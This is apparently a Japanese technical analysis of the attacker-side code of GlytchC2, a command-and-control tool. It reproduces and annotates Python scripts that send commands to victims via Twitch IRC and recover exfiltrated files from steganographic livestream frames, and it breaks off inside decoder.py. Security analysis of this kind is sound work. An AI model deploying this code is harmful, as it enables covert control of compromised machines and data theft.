ファイル構成と概要
GlytchC2-main/attacker/ ├── attacker.py ... Attacker側メインスクリプト(コマンド送信・ストリーム録画・デコード制御) ├── crawler.py ... Twitch配信URLの取得とフレームキャプチャ ├── decoder.py ... グレースケール画像→データ変換(ステガノグラフィデコーダ) ├── twitch_chat_irc.py ... Twitch IRC通信ライブラリ(※別ドキュメントで詳細解析) └── example.env ... 環境変数テンプレート(Twitch認証情報)
| ファイル | 種別 | 行数 | 役割概要 |
|---|---|---|---|
attacker.py |
Python スクリプト | 179行 | IRC経由でコマンドを送信し、Victimの配信を録画・デコードして結果を取得する |
crawler.py |
Python スクリプト | 71行 | streamlinkでTwitch配信のm3u8 URLを取得し、ffmpegでフレームをPNGとしてキャプチャする |
decoder.py |
Python スクリプト | 250行 | エンコード済みPNG画像からマーカー検出→ヘッダ解析→ペイロード復元でデータを再構成する |
twitch_chat_irc.py |
Python ライブラリ | 217行 | Twitch IRCプロトコルによるチャットメッセージ送受信(共有モジュール、03_twitch_irc.mdで解析) |
example.env |
設定テンプレート | 5行 | Twitchユーザー名とOAuthトークンのテンプレート |
解析の流れ: 本ドキュメントでは、Attacker 側の動作フロー(コマンド送信→ハンドシェイク→ストリーム録画→重複除去→デコード→データ復元)を俯瞰した後、
attacker.py(オーケストレーション)、crawler.py(ストリーム取得)、decoder.py(データ復元)の順にコードレベルで詳細解析する。
1. Attacker側の全体動作フロー
GlytchC2 の Attacker 側は、攻撃者が自身のマシン上で実行する制御コンソールである。Victim 側エージェントに対して IRC チャット経由でコマンドを送信し、Victim が Twitch ライブ配信として送り返すデータを録画・デコードすることで、コマンド実行結果やファイルを取得する。

Attacker 側の特徴は、3 つの独立したツール(attacker.py, crawler.py, decoder.py)を subprocess 経由でパイプライン的に連携させている点にある。attacker.py がオーケストレータ(指揮者)として全体のフローを制御し、crawler.py がストリーム録画、decoder.py がデータ復元をそれぞれ担当する。
2. attacker.py — コマンド送信・ストリーム録画制御
2.1 インポートと定数定義
#!/usr/bin/env python3 # Developed by Anıl Çelik (@ccelikanil) and Emre Odaman (@eodaman), ... import argparse # ← コマンドライン引数の解析 import base64 # ← Base64エンコード(コマンド送信用) import hashlib # ← SHA-256ハッシュ(重複フレーム検出用) import os # ← ファイル操作(一覧取得、削除等) import re # ← 正規表現(decoderの出力パース用) import subprocess# ← 外部プロセス起動(crawler, decoder) import time # ← 待機・タイムアウト制御 import uuid # ← UUID生成(コマンドの一意ID生成) from twitch_chat_irc import TwitchChatIRC# ← Twitch IRC通信モジュール
(attacker.py 1〜14行目)
hashlib: Python 標準ライブラリのハッシュ関数モジュール。ここでは SHA-256(Secure Hash Algorithm 256-bit)を使用して、録画した PNG フレームの重複を検出する。SHA-256 は任意の長さのデータから 256 ビット(32 バイト)の固定長ハッシュ値(ダイジェスト)を生成する暗号学的ハッシュ関数であり、異なるデータが同じハッシュ値を生成する確率(衝突確率)は天文学的に小さい。
uuid: UUID(Universally Unique Identifier、普遍的一意識別子)を生成するモジュール。UUID4 はランダムに生成される 128 ビットの識別子で、衝突確率は事実上ゼロである。ここではコマンドごとに一意の 8 文字 16 進数 ID を生成するために使用される。
# --- Constants --- OK_TIMEOUT = 30 # ← "OK" 応答の待機タイムアウト(秒) READY_TIMEOUT = 600 # ← "READY" 応答の待機タイムアウト(秒) CRAWLER_SCRIPT = "crawler.py" # ← ストリーム録画スクリプト名 DECODER_SCRIPT = "decoder.py" # ← デコーダスクリプト名 RETRY_DELAY = 1 # ← crawler リトライ間隔(秒)
(attacker.py 16〜21行目)
READY_TIMEOUT = 600(600秒 = 10分): Victim 側がコマンドを実行し、結果をエンコードし、動画を生成するまでの待機時間。大きなファイルのエンコードには時間がかかるため、10 分と長めに設定されている。
2.2 コマンド送信関数
Attacker がユーザーから入力を受け取り、UID を付与して Base64 エンコードし、IRC チャット経由で Victim に送信する。
def generate_short_id(): """Generate an 8-character hex string (using UUID4).""" return uuid.uuid4().hex[:8] # ← UUID4の16進表現から先頭8文字を切り出し
(attacker.py 40〜42行目)
uuid.uuid4().hex[:8]: uuid.uuid4() はランダムな UUID を生成する。.hex プロパティは UUID をハイフンなしの 32 文字 16 進数文字列に変換する(例: 'a1b2c3d4e5f6789012345678abcdef01')。[:8] でその先頭 8 文字を取得する。8 文字の 16 進数は 16^8 = 4,294,967,296(約 43 億)通りの値を持つため、通常の使用では衝突はほぼ発生しない。
def send_command(chat, channel, command_text): """ Prepend a short unique ID to the command, Base64-encode it, and send it via chat. """ uid = generate_short_id() # ← 8文字のユニークID生成 payload = f"{uid}:{command_text}" # ← "uid:command" 形式に組み立て b64_payload = base64.b64encode(payload.encode()).decode() # ← UTF-8バイト列→Base64→文字列 chat.send(channel, b64_payload) # ← IRC チャットに送信 print(f"[Attacker] Sent command with ID: {uid}") return uid # ← UIDを返す(後続処理で照合に使用)
(attacker.py 44〜54行目)
base64.b64encode(payload.encode()).decode()(51行目) の処理は Victim 側のデコードの逆操作:
payload.encode(): 文字列"uid:command"を UTF-8 バイト列に変換base64.b64encode(...): バイト列を Base64 エンコードし、バイト列を返す.decode(): Base64 エンコード済みバイト列を ASCII 文字列に変換
例: "abc12345:whoami" → b"abc12345:whoami" → b"YWJjMTIzNDU6d2hvYW1p" → "YWJjMTIzNDU6d2hvYW1p"
この文字列が IRC チャットのメッセージとして送信される。IRC プロトコルはテキストベースであるため、Base64 の ASCII 文字列は問題なく送受信できる。
2.3 応答待機関数
Victim からの制御シグナル("OK" や "READY")を指定されたタイムアウト内でポーリング待機する。
def wait_for_response(chat, channel, expected_message, timeout): """Poll the channel until a message exactly matching expected_message is received.""" start = time.time() # ← タイムアウト計測の起点 while time.time() - start < timeout: # ← 経過時間がtimeout未満の間ループ messages = chat.listen(channel, timeout=5, message_limit=1) # ← 5秒タイムアウトで1件受信 for msg in messages: text = msg.get("message", "").strip() # ← メッセージ本文を取得 if text == expected_message: # ← 完全一致で判定 print(f"[Attacker] Received expected response: {text}") return True # ← 期待するメッセージを受信 time.sleep(1) # ← 1秒待って再ポーリング print(f"[Attacker] Timeout waiting for '{expected_message}'.") return False # ← タイムアウト
(attacker.py 56〜68行目)
ポーリング方式の設計: この関数は「ポーリング」(定期的な問い合わせ)方式で応答を待つ。chat.listen() は最大 5 秒間ブロックし、メッセージを受信するか 5 秒経過すると戻る。受信したメッセージが期待値と一致しなければ 1 秒待って再試行する。外側の while ループが timeout 秒で終了する。
完全一致判定(63行目): text == expected_message で厳密な文字列比較を行う。これは、IRC チャットに他のユーザーが書き込んだメッセージを誤って制御シグナルと認識することを防ぐための設計だが、一般のチャット参加者が "OK" や "READY" と書き込んだ場合には誤認が発生する。この問題については後述の弱点セクションで議論する。
2.4 ストリームキャプチャ関数(中核関数)
capture_stream() は Attacker 側の中核関数であり、Victim が Twitch に配信する映像ストリームを録画し、重複フレームを除去した後、decoder.py を呼び出してデータを復元する。
def capture_stream(uid, channel): """ Invoke the crawler to capture the victim's stream. ... Returns the file name reconstructed by the decoder. """ # Prepare an output pattern that includes the unique ID. output_pattern = f"{uid}-%04d.png" # ← ffmpegの連番パターン(例: "a1b2c3d4-%04d.png") channel = f"https://twitch.tv/{channel}"# ← チャンネルURL構築 crawler_cmd = [ "python", CRAWLER_SCRIPT, # ← crawler.py を起動 "--channel", channel, # ← チャンネルURL "--output", output_pattern # ← 出力ファイルパターン ]
(attacker.py 70〜81行目)
output_pattern = f"{uid}-%04d.png"(79行目): ffmpeg が出力する連番画像のファイル名パターン。%04d は ffmpeg の連番書式指定で、4 桁のゼロ埋め整数(0001, 0002, ...)に置換される。UID をプレフィックスに含めることで、異なるコマンドの出力画像が混在しないようにしている。例: a1b2c3d4-0001.png, a1b2c3d4-0002.png, ...
print(f"[Attacker] Starting crawler with output pattern: {output_pattern}") while True: try: subprocess.run(crawler_cmd, check=True) # ← crawler.py を実行 break # ← 成功したらループを抜ける except subprocess.CalledProcessError as e: print(f"[Attacker] Crawler failed to get stream link, retrying in {RETRY_DELAY} seconds...") time.sleep(RETRY_DELAY) # ← 1秒待ってリトライ
(attacker.py 83〜90行目)
リトライループ: crawler.py は streamlink ツールを使用して Twitch 配信の URL を取得するが、Victim の配信開始タイミングとの間にラグがある場合、配信がまだ開始されていないためにストリーム URL の取得に失敗する可能性がある。このリトライループにより、配信が開始されるまで繰り返し試行する。check=True により、crawler.py が非ゼロ終了コードを返した場合に CalledProcessError が発生し、except 節でキャッチされて再試行に移る。
# Remove duplicate PNG frames. seen_hashes = set() # ← 既出フレームのSHA-256ハッシュ集合 png_files = sorted( # ← UIDで始まるPNGファイルをソート f for f in os.listdir() if f.endswith(".png") and f.startswith(uid) ) for f in png_files: with open(f, "rb") as img: h = hashlib.sha256(img.read()).hexdigest() # ← ファイル全体のSHA-256ハッシュを計算 if h in seen_hashes: os.remove(f) # ← 重複フレームを削除 print(f"[Attacker] Removed duplicate frame: {f}") else: seen_hashes.add(h) # ← 新規ハッシュを記録
(attacker.py 92〜102行目)
SHA-256 による重複フレーム除去:
映像ストリームを毎秒 1 フレームでキャプチャする際(crawler.py のデフォルト設定)、Victim 側で 1 枚のデータ画像が 10 秒間表示される(ffmpeg の -framerate 1/10 設定)ため、同一フレームが最大 10 枚キャプチャされる。これらの重複を除去するために SHA-256 ハッシュを使用する。
処理の流れ:
1. os.listdir() でカレントディレクトリのファイル一覧を取得
2. UID で始まる PNG ファイルのみをフィルタし、ファイル名順にソート
3. 各ファイルの全バイト列の SHA-256 ハッシュを計算
4. 同じハッシュが既に出現していれば(= 同一内容のフレーム)、そのファイルを削除
5. 新しいハッシュであれば、seen_hashes 集合に追加して保持
SHA-256 の選択理由: SHA-256 は 256 ビットのハッシュ値を生成するため、異なるファイルが同じハッシュ値を持つ確率(衝突確率)は 2^(-128) 程度であり、実用上ゼロと見なせる。MD5 等の弱いハッシュ関数と比較して衝突耐性が高いが、ここでの用途(重複検出)では MD5 でも十分である。ただし、セキュリティツールとして SHA-256 を選択しているのは合理的である。
if not png_files: print("[Attacker] No PNG frames found for decoding.") return None # ← フレームがなければ None を返す # Run decoder.py with the list of PNG files. decoder_cmd = ["python", DECODER_SCRIPT] + png_files# ← decoder.py にPNGファイル一覧を渡す try: result = subprocess.check_output( # ← 標準出力をキャプチャして実行 decoder_cmd, stderr=subprocess.STDOUT # ← stderrもstdoutにマージ ) output = result.decode() # ← バイト列を文字列に変換 print("[Attacker] Decoder output:") print(output) import re # ← 正規表現モジュール(※冒頭でも既にimport済み) match = re.search( # ← decoder出力からファイル名を抽出 r"Reconstructed data saved to (.+)", output ) if match: reconstructed_file = match.group(1).strip() # ← キャプチャグループ1 = ファイル名 print(f"[Attacker] Decoded file available as: {reconstructed_file}") return reconstructed_file # ← 復元されたファイル名を返す else: print("[Attacker] Could not parse the reconstructed file name ...") return None except subprocess.CalledProcessError as e: print("[Attacker] Decoder failed:", e.output.decode()) return None
(attacker.py 104〜128行目)
decoder.py の呼び出しと出力パース:
subprocess.check_output() は subprocess.run() と同様に外部コマンドを実行するが、標準出力の内容をバイト列として返す点が異なる。stderr=subprocess.STDOUT により、標準エラー出力も標準出力にマージされる。
decoder.py は正常終了時に "Reconstructed data saved to <filename>" というメッセージを出力する。正規表現 r"Reconstructed data saved to (.+)" でこのメッセージからファイル名を抽出する。(.+) は 1 文字以上の任意の文字列にマッチするキャプチャグループであり、match.group(1) でその内容を取得する。
import re の重複(117行目): ファイル冒頭(9 行目)で既に import re が実行されているが、関数内で再度 import re が記述されている。Python では同じモジュールの再 import はキャッシュされるため実害はないが、コードの整理としては冗長である。
2.5 メインループ
def main(): print(banner) # ← ASCIIアートバナーを表示 parser = argparse.ArgumentParser( description="Attacker: send commands over Twitch IRC and capture victim's stream" ) parser.add_argument("--channel", required=True, # ← 監視チャンネル名(必須) help="Twitch channel name to watch") args = parser.parse_args() chat = TwitchChatIRC() # ← IRC接続を確立 try: while True: # ← 無限ループ: コマンド入力待ち user_input = input( # ← ユーザーからの対話入力 "Enter system command or file request (prefix file: to request file): " ).strip() if not user_input: break # ← 空入力で終了 uid = send_command(chat, args.channel, user_input) # ← コマンド送信
(attacker.py 130〜148行目)
Attacker 側は --channel のみが必須引数: Victim 側と異なり、--streamkey は不要である。Attacker は配信を受信する(視聴する)側であり、配信を開始する側ではないためである。
input() による対話的入力: Attacker はターミナル上で対話的にコマンドを入力する。input() は標準入力から 1 行を読み取り、改行文字を除いて文字列として返す。空文字列が入力された場合(Enter キーのみ)にループを抜けて終了する。
# Wait for "OK" message (ignore errors). if not wait_for_response(chat, args.channel, "OK", OK_TIMEOUT): print("[Attacker] Proceeding despite missing OK.") # ← OKなしでも続行 else: # Once OK is received, wait for "READY". if not wait_for_response(chat, args.channel, "READY", READY_TIMEOUT): print("[Attacker] Did not receive READY; skipping this round.") continue # ← READYなしならスキップ # When READY arrives, reply with "OK". chat.send(args.channel, "OK") # ← Victimに配信開始を許可 print("[Attacker] Sent OK after READY. Beginning stream capture.") # Capture and process the stream. result_file = capture_stream(uid, args.channel) # ← ストリーム録画→デコード if result_file: if user_input.startswith("file:"): print(f"[Attacker] Received file: {result_file}") # ← ファイル受信成功 else: print(f"[Attacker] Command output from {result_file}:") with open(result_file, "r") as f: print(f.read()) # ← コマンド出力をターミナルに表示 else: print("[Attacker] No file recovered from the stream.") except KeyboardInterrupt: print("\n[Attacker] Exiting.") finally: chat.close_connection() # ← IRC接続の切断
(attacker.py 150〜176行目)
ハンドシェイクシーケンスの Attacker 側ロジック:
"OK" 待ち(151行目): Victim がコマンドを受信したことを示す
"OK"を最大 30 秒待つ。タイムアウトした場合でも処理を続行する("Proceeding despite missing OK.")。ただし、この分岐ではelse節に入らないため、"READY"の待機やcapture_stream()の呼び出しは実行されない。実質的に、"OK"が来なければそのコマンドは無視される構造になっている。"READY" 待ち(155行目): Victim が結果のエンコードと動画生成を完了し、配信準備ができたことを示す
"READY"を最大 600 秒(10分)待つ。タイムアウトした場合はcontinueでこのコマンドの処理をスキップし、次の入力を待つ。"OK" 送信(159行目):
"READY"を受信したら、Attacker 側から"OK"を送信して配信開始を許可する。この後すぐにcapture_stream()を呼び出してストリーム録画を開始する。結果の表示(164〜170行目): デコードに成功した場合、コマンドの種類に応じて結果を表示する。
file:プレフィックスのコマンドではファイル名のみを表示し、OS コマンドでは復元されたファイルの内容をターミナルに出力する。
コールチェーン(メインフロー全体):
main()
→ input() でユーザー入力
→ send_command(chat, channel, user_input)
→ generate_short_id() → uid
→ base64.b64encode("uid:command") → b64_payload
→ chat.send(channel, b64_payload)
→ wait_for_response(chat, channel, "OK", 30)
→ wait_for_response(chat, channel, "READY", 600)
→ chat.send(channel, "OK")
→ capture_stream(uid, channel)
→ subprocess.run(["python", "crawler.py", ...]) ... ストリーム録画
→ SHA-256 重複フレーム除去
→ subprocess.check_output(["python", "decoder.py", ...]) ... デコード
→ re.search() でファイル名抽出
→ open(result_file) → print(content)
参照
| ID | タイトル | URL | 対応箇所 |
|---|---|---|---|
| 1 | hashlib — Secure hashes — Python docs | https://docs.python.org/3/library/hashlib.html | SHA-256 ハッシュ計算 |
| 2 | uuid — UUID objects — Python docs | https://docs.python.org/3/library/uuid.html | UUID4 生成 |
| 3 | subprocess — Python docs | https://docs.python.org/3/library/subprocess.html | check_output, CalledProcessError |
3. crawler.py — ストリームURL取得とフレームキャプチャ
crawler.py は 71 行の小さなスクリプトだが、GlytchC2 の通信チャネルにおいて重要な役割を果たす。Twitch のライブ配信から映像ストリームの URL を取得し、ffmpeg を使用してフレームを PNG 画像としてキャプチャする。
3.1 ストリームURL取得関数
#!/usr/bin/env python3 import subprocess import sys import argparse def get_stream_url(channel_url, quality): """ Uses streamlink to extract the m3u8 URL for a given Twitch channel. """ try: result = subprocess.run( ["streamlink", "--stream-url", channel_url, quality], # ← streamlinkコマンドを実行 capture_output=True, # ← stdout/stderrをキャプチャ text=True, # ← 文字列として取得 check=True # ← 非ゼロ終了で例外発生 ) stream_url = result.stdout.strip() # ← 出力されたURLを取得 if not stream_url: raise ValueError("No stream URL found") # ← URLが空の場合のエラー return stream_url except subprocess.CalledProcessError as e: print("Error running streamlink command:", e, file=sys.stderr) sys.exit(1) # ← 終了コード1で異常終了 except Exception as e: print("Error:", e, file=sys.stderr) sys.exit(1)
(crawler.py 1〜27行目)
streamlink は、ライブストリーミングサービス(Twitch、YouTube 等)から映像ストリームの URL を抽出するオープンソースのコマンドラインツールである。通常は映像プレーヤーにストリームを渡すために使用されるが、--stream-url オプションを指定するとストリームの直接 URL(通常は m3u8 形式の HLS プレイリスト URL)のみを出力して終了する。
HLS と m3u8: HLS(HTTP Live Streaming)は Apple が開発したストリーミングプロトコルであり、映像を短い(数秒〜数十秒の)セグメントに分割し、HTTP 経由で配信する。m3u8 は HLS のプレイリストファイル形式であり、各セグメントの URL と再生順序が記述されている。Twitch を含む主要な配信プラットフォームは HLS を採用している。
quality パラメータ: ストリームの画質を指定する。デフォルトは "best"(最高画質)。ステガノグラフィではピクセル値の正確さが重要であるため、最高画質を選択することで圧縮による劣化を最小化している。
sys.exit(1) の意図(23, 26行目): ストリーム URL の取得に失敗した場合、終了コード 1 で異常終了する。この非ゼロ終了コードが attacker.py の subprocess.run(crawler_cmd, check=True) で CalledProcessError として検出され、リトライループが発動する。
3.2 フレーム録画関数
def record_stream(stream_url, output_file): """ Uses ffmpeg to capture frames from the provided stream URL and save them as images. """ try: ffmpeg_command = [ "ffmpeg", "-i", stream_url, # ← 入力: HLSストリームURL "-vf", "fps=1", # ← 映像フィルタ: 1秒に1フレーム抽出 output_file # ← 出力パターン(例: "uid-%04d.png") ] print("Running ffmpeg command:", " ".join(ffmpeg_command)) subprocess.run(ffmpeg_command, check=True) # ← ffmpegを実行 except subprocess.CalledProcessError as e: print("Error running ffmpeg command:", e, file=sys.stderr) sys.exit(1)
(crawler.py 29〜40行目)
-vf "fps=1": 映像フィルタとして fps=1 を指定し、入力ストリームから毎秒 1 フレームを抽出する。Victim 側の配信は 30fps であるが、同じ画像が長時間表示されるため、1fps で十分である。むしろ 30fps で全フレームを保存すると、10秒 × 30fps = 300枚 の同一フレームが保存されてしまい、ディスク容量と後続の重複除去処理に負担がかかる。
出力ファイル名パターン: output_file は attacker.py から渡されるパターン文字列(例: "a1b2c3d4-%04d.png")である。ffmpeg はこのパターンの %04d 部分を連番(0001, 0002, ...)に置換して各フレームを個別の PNG ファイルとして保存する。
配信終了の検出: ffmpeg は入力ストリームの終了(Victim 側の配信停止)を検出すると自動的に終了する。HLS ストリームでは、プレイリストの更新が停止し新しいセグメントが提供されなくなることで終了が検出される。
3.3 main関数 — 全体の実行制御
def main(): parser = argparse.ArgumentParser( description="Extract Twitch stream URL using streamlink and capture frames using ffmpeg." ) parser.add_argument("--channel", default="https://twitch.tv/bilocan1337", # ← デフォルトチャンネル(開発者のテスト用) help="Twitch channel URL") parser.add_argument("--quality", default="best", # ← 画質: デフォルト最高 help="Stream quality to extract") parser.add_argument("--output", default="frame-%04d.png", # ← デフォルト出力パターン help="Output filename pattern for ffmpeg recording") args = parser.parse_args() print("Extracting stream URL for channel:", args.channel) stream_url = get_stream_url(args.channel, args.quality) # ← streamlinkでURL取得 print("Retrieved stream URL:", stream_url) print("Capturing frames to files with pattern:", args.output) record_stream(stream_url, args.output) # ← ffmpegでフレーム録画
(crawler.py 42〜69行目)
デフォルトチャンネル(48行目): --channel のデフォルト値が "https://twitch.tv/bilocan1337" に設定されている。これは開発者のテスト用チャンネルと思われる。実運用時は attacker.py から明示的にチャンネル URL が渡される。
コールチェーン:
crawler.py main()
→ get_stream_url(channel, quality)
→ subprocess.run(["streamlink", "--stream-url", channel, quality])
→ return stream_url (m3u8 URL)
→ record_stream(stream_url, output)
→ subprocess.run(["ffmpeg", "-i", stream_url, "-vf", "fps=1", output])
→ PNGファイル群が生成される
参照
| ID | タイトル | URL | 対応箇所 |
|---|---|---|---|
| 1 | Streamlink Documentation | https://streamlink.github.io/ | streamlink の使用方法 |
| 2 | HTTP Live Streaming — Apple Developer | https://developer.apple.com/streaming/ | HLS/m3u8 プロトコル |
| 3 | FFmpeg Documentation — Video Filters | https://ffmpeg.org/ffmpeg-filters.html#fps-1 | fps フィルタ |
4. decoder.py — ステガノグラフィデコーダの詳細解析
decoder.py は encoder.py(01_victim.md で解析済み)の逆操作を行い、グレースケール PNG 画像からバイナリデータを復元する。encoder.py と同じ定数・ヘッダ構造を前提とするため、両者の定数が一致している必要がある。
4.1 定数定義とグレースケール→ニブル逆変換
#!/usr/bin/env python3 import argparse, math, os, glob from PIL import Image # These constants must match those used by the encoder. HEADER_HEIGHT = 50 # ← ヘッダバンドの高さ(encoder側と一致必須) FILENAME_FIELD_SIZE = 256 # ← ファイル名フィールドサイズ FILENAME_LENGTH_FIELD_SIZE = 2 HEADER_EXTRA = FILENAME_LENGTH_FIELD_SIZE + FILENAME_FIELD_SIZE # ← 258バイト HEADER_FIXED_BYTES = 4 + 2 + 2 + 4 + 4 + 1 + 2 + 2 # ← 21バイト HEADER_BYTES = HEADER_FIXED_BYTES + HEADER_EXTRA # ← 279バイト HEADER_NIBBLES = HEADER_BYTES * 2 # ← 558ニブル MARKER_COLOR = 128 # ← マーカー色(encoder側と一致必須)
(decoder.py 1〜13行目)
全ての定数がエンコーダ側と同一の値で定義されている。これらの定数が 1 つでも食い違うと、デコーダはヘッダを正しく解析できず、データの復元に失敗する。
def color_to_nibble(gray_val): """Convert an 8-bit grayscale value to a nibble (0-15).""" return gray_val // 17 # ← 切り捨て除算で逆変換
(decoder.py 15〜17行目)
エンコーダの nibble_to_gray() の逆変換。グレースケール値を 17 で切り捨て除算(floor division)することで、元のニブル値を復元する。例えば、グレースケール値 170 は 170 // 17 = 10 でニブル値 10(0xA)に戻る。
映像ストリーミング中の圧縮や再圧縮により、ピクセル値にわずかな誤差が生じる可能性がある。例えば、元の値が 170 の箇所が 168 や 172 になるケース。この場合でも 168 // 17 = 9(誤り)や 172 // 17 = 10(正しい)のように、誤差の方向と大きさによって正確性が異なる。±8 以内の誤差であれば正しい結果が得られるが、±9 以上の誤差では誤りが発生する。CRF 0(ロスレス)のエンコーディングとグレースケール(色差サブサンプリングなし)の組み合わせにより、理論的にはピクセル値の変化は発生しないが、Twitch のトランスコーディングによる影響は使用条件に依存する。
4.2 マーカーライン検出関数
デコーダが最初に行うべき処理は、画像内のデータ領域の正確な位置を特定することである。これは、マーカーライン(encoder が描画したグレースケール値 128 のライン)をスキャンすることで行われる。
def find_marker_edges(img, threshold=0.8, search_window=100, debug=False): """ Scan near each edge of the image (within 'search_window' pixels) to detect marker lines. A row/column is accepted if at least 'threshold' fraction of its pixels equal MARKER_COLOR. Returns (top, bottom, left, right) coordinates. """ width, height = img.size # ← 画像のピクセル寸法 def check_row(y): count = sum( # ← 行y全体でマーカー色のピクセル数をカウント 1 for x in range(width) if img.getpixel((x, y)) == MARKER_COLOR ) fraction = count / width # ← マーカー色の割合を計算 if debug: print(f"Row {y}: {fraction*100:.1f}% marker") return fraction # ← 割合を返す def check_col(x): count = sum( # ← 列x全体でマーカー色のピクセル数をカウント 1 for y in range(height) if img.getpixel((x, y)) == MARKER_COLOR ) fraction = count / height if debug: print(f"Col {x}: {fraction*100:.1f}% marker") return fraction
(decoder.py 19〜39行目)
check_row(y) / check_col(x) 内部関数: 指定された行(水平ライン)または列(垂直ライン)をスキャンし、マーカー色(128)と一致するピクセルの割合を計算する。
しきい値(threshold)の役割: デフォルトしきい値は 0.8(80%)である。マーカーラインの全ピクセルがマーカー色であるのが理想だが、映像ストリーミング中の圧縮や角にある外枠との交差部分で一部のピクセルが変化する可能性がある。80% を基準にすることで、多少の劣化があってもマーカーラインとして検出できる。
top = next( # ← 上辺マーカーの検出(上から走査) (y for y in range(0, min(search_window, height)) if check_row(y) >= threshold), None # ← 見つからなければ None ) bottom = next( # ← 下辺マーカーの検出(下から走査) (y for y in range(height - 1, max(height - search_window, 0) - 1, -1) if check_row(y) >= threshold), None ) left = next( # ← 左辺マーカーの検出(左から走査) (x for x in range(0, min(search_window, width)) if check_col(x) >= threshold), None ) right = next( # ← 右辺マーカーの検出(右から走査) (x for x in range(width - 1, max(width - search_window, 0) - 1, -1) if check_col(x) >= threshold), None ) if None in (top, bottom, left, right): raise ValueError("Failed to detect marker lines on one or more sides.") return top, bottom, left, right
(decoder.py 41〜48行目)
走査アルゴリズム: 画像の各辺から search_window(デフォルト 100 ピクセル)以内の範囲を走査し、しきい値以上のマーカー色ピクセルを含む最初の行/列を検出する。
- 上辺: y=0 から下方向に走査し、最初に条件を満たす行 y を
topとする - 下辺: y=height-1 から上方向に走査し、最初に条件を満たす行 y を
bottomとする - 左辺: x=0 から右方向に走査し、最初に条件を満たす列 x を
leftとする - 右辺: x=width-1 から左方向に走査し、最初に条件を満たす列 x を
rightとする
next() とジェネレータ式: next(generator, default) はジェネレータから最初の要素を取得し、要素がなければ default を返す。ここではジェネレータ式で各行/列を評価し、条件を満たす最初の座標を返す。見つからなければ None が返り、4 辺のいずれかが None の場合は ValueError 例外が発生する。
4.3 ヘッダ抽出関数
マーカーラインの座標が特定された後、データ領域の上部からヘッダを読み取る。
def extract_header(img, data_x, data_y, data_width): """Extract the header from the top of the data region.""" header_nibbles = [] for i in range(HEADER_NIBBLES): # ← 558ニブルを順に読み取る cell_left = data_x + round(i * data_width / HEADER_NIBBLES) # ← セル左端 cell_right = data_x + round((i + 1) * data_width / HEADER_NIBBLES) # ← セル右端 center_x = (cell_left + cell_right) // 2 # ← セルの水平中央 center_y = data_y + HEADER_HEIGHT // 2 # ← ヘッダ領域の垂直中央 header_nibbles.append( # ← 中央ピクセルのグレースケール値→ニブル color_to_nibble(img.getpixel((center_x, center_y))) ) header_bytes = bytearray() for i in range(0, HEADER_NIBBLES, 2): # ← 2ニブルずつ結合してバイトに復元 header_bytes.append( (header_nibbles[i] << 4) | header_nibbles[i+1] # ← 上位ニブル<<4 | 下位ニブル ) return header_bytes
(decoder.py 50〜62行目)
セル中央ピクセルの読み取り(57〜58行目): エンコーダはセル全体を同一色で塗りつぶすため、セルのどのピクセルを読み取っても同じ値が得られるはずである。しかし、映像ストリーミング中の圧縮によりセルの端部(隣接セルとの境界)でアーティファクトが発生する可能性がある。セルの中央を読み取ることで、このような境界アーティファクトの影響を最小化している。
ニブル→バイト復元(60〜62行目): 2 つのニブルを 1 バイトに結合する。上位ニブルを左に 4 ビットシフト(<< 4)し、下位ニブルとビット OR(|)で結合する。例: ニブル 10 と 3 → (10 << 4) | 3 = 160 | 3 = 163 = 0xA3
4.4 フラグメントデコード関数(中核関数)
decode_fragment() は 1 枚の PNG 画像からデータを復元する中核関数である。
def decode_fragment(filename, threshold, search_window, debug, fb_width, fb_height, fb_border): """ Decodes a fragment image: - Uses marker detection (or fallback if needed) to define the data region. - Extracts the header and payload grid. Returns a tuple: (fragment index, total fragments, payload bytes, file_name, header_signature) """ img = Image.open(filename).convert("L") # ← 画像を開きグレースケールに変換 rec_width, rec_height = img.size # ← 画像の実際のサイズ print(f"Processing {filename} (size: {rec_width}×{rec_height})") fallback_used = False try: top_marker, bottom_marker, left_marker, right_marker = find_marker_edges( img, threshold, search_window, debug # ← マーカー検出を試行 ) print(f" Detected markers: top={top_marker}, ...") except ValueError: # ← マーカー検出失敗 fallback_used = True offset_x = (fb_width - rec_width) // 2 # ← 横方向のオフセット(クロップ補正) top_marker = fb_border # ← フォールバック: border値を使用 left_marker = fb_border - offset_x right_marker = fb_width - fb_border - 1 - offset_x bottom_marker = fb_height - fb_border - 1 print(" Marker detection failed; using fallback ...")
(decoder.py 64〜88行目)
.convert("L")(72行目): 画像をグレースケールモードに変換する。入力画像がRGBやRGBAの場合でも、この変換により単一チャネルのグレースケール画像として処理される。エンコーダがグレースケール画像を生成しているため、通常は元からグレースケールだが、映像配信→録画のプロセスで RGB に変換されている可能性がある。
フォールバック処理(80〜87行目): マーカー検出に失敗した場合の代替処理。これは、映像ストリーミング中にマーカーラインが劣化してしきい値を下回った場合に発動する。フォールバックでは、ヘッダに記録された期待画像サイズ(fb_width, fb_height)と外枠太さ(fb_border)からデータ領域の座標を逆算する。offset_x は画像が水平方向にクロップされた場合の補正値である。
safe_x = left_marker # ← 安全領域左端 safe_y = top_marker # ← 安全領域上端 safe_width = right_marker - left_marker + 1 # ← 安全領域幅 safe_height = bottom_marker - top_marker + 1 # ← 安全領域高さ data_x = safe_x + 1 # ← データ領域左端(マーカー1px分内側) data_y = safe_y + 1 # ← データ領域上端 data_width = safe_width - 2 # ← データ領域幅 data_height = safe_height - 2 # ← データ領域高さ header_bytes = extract_header(img, data_x, data_y, data_width) # ← ヘッダ抽出 if len(header_bytes) != HEADER_BYTES: raise ValueError("Header extraction failed.")
(decoder.py 90〜101行目)
マーカー座標から安全領域、さらにデータ領域の座標を算出する。エンコーダ側と同一のロジック(マーカー 1 ピクセル分を内側にオフセット)でデータ領域を特定する。
# Parse header fixed part. payload_length = int.from_bytes(header_bytes[0:4], 'big') # ← ペイロード長(4バイト) grid_cols = int.from_bytes(header_bytes[4:6], 'big') # ← グリッド列数(2バイト) grid_rows = int.from_bytes(header_bytes[6:8], 'big') # ← グリッド行数(2バイト) header_frag_index = int.from_bytes(header_bytes[8:12], 'big') # ← フラグメント番号(4バイト) total_fragments = int.from_bytes(header_bytes[12:16], 'big') # ← フラグメント総数(4バイト) border_in_header = header_bytes[16] # ← 外枠太さ(1バイト) expected_width_from_header = int.from_bytes(header_bytes[17:19], 'big') # ← 期待画像幅(2バイト) expected_height_from_header = int.from_bytes(header_bytes[19:21], 'big') # ← 期待画像高さ(2バイト) # Parse file name field. file_name_length = int.from_bytes(header_bytes[21:23], 'big') # ← ファイル名長(2バイト) file_name_bytes = 